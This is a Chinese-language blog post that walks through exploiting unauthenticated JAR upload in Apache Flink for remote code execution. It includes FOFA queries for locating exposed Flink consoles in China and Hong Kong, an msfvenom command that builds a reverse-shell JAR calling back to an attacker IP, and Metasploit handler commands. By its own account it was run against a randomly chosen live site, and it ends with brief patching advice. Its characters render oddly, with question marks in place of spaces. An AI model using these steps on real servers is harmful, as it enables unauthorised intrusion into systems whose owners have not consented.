Apache Flink 未授權(quán)訪問(wèn)+遠(yuǎn)程代碼執(zhí)行
Apache Flink 未授權(quán)訪問(wèn)+遠(yuǎn)程代碼執(zhí)行
前言
近日,有安全研究員公開(kāi)了一個(gè)Apache Flink的任意Jar包上傳導(dǎo)致遠(yuǎn)程代碼執(zhí)行的漏洞,影響范圍:<= 1.9.1(最新版本) 此次復(fù)現(xiàn)就是通過(guò)版本Version: 1.10.1進(jìn)行復(fù)現(xiàn)利用。
FOFA
FOFA?語(yǔ)句
app="Apache-Flink"?&&?country="CN"
app="Apache-Flink"?&&?country="CN"?&&?region="HK"

國(guó)內(nèi)還是很多使用 Apache Flink 的,大概有1K+的數(shù)量左右
漏洞復(fù)現(xiàn)
1、這里隨便搞個(gè)站打開(kāi)進(jìn)行復(fù)現(xiàn),打開(kāi)以后就長(zhǎng)這樣子。

點(diǎn)擊Submit New Job翻譯:文件上傳
2、打開(kāi)MSF 生成一個(gè) jar 木馬
msfvenom?-p?java/meterpreter/reverse_tcp?LHOST=**.***.59.61??LPORT=4444?-f?jar?>?testone.jar

3、點(diǎn)擊 Add 上傳 jar 文件

4、設(shè)置監(jiān)聽(tīng)端口
msf5?>?use?exploit/multi/handler
[*]?Using?configured?payload?generic/shell_reverse_tcp
msf5?exploit(multi/handler)?>?set?payload?java/shell/reverse_tcp?
payload?=>?java/shell/reverse_tcp
msf5?exploit(multi/handler)?>?set?lhost?XX.XXX.XX.61
lhost?=>?XX.XXX.XX.61
msf5?exploit(multi/handler)?>?set?lport?4444
lport?=>?4444
msf5?exploit(multi/handler)?>?run

5、點(diǎn)擊下 submit

6、反彈shell成功

修復(fù)建議
建議用戶關(guān)注Apache Flink官網(wǎng),及時(shí)獲取該漏洞最新補(bǔ)丁。臨時(shí)解決建議 設(shè)置IP白名單只允許信任的IP訪問(wèn)控制臺(tái)并添加訪問(wèn)認(rèn)證。
- END -評(píng)論
圖片
表情
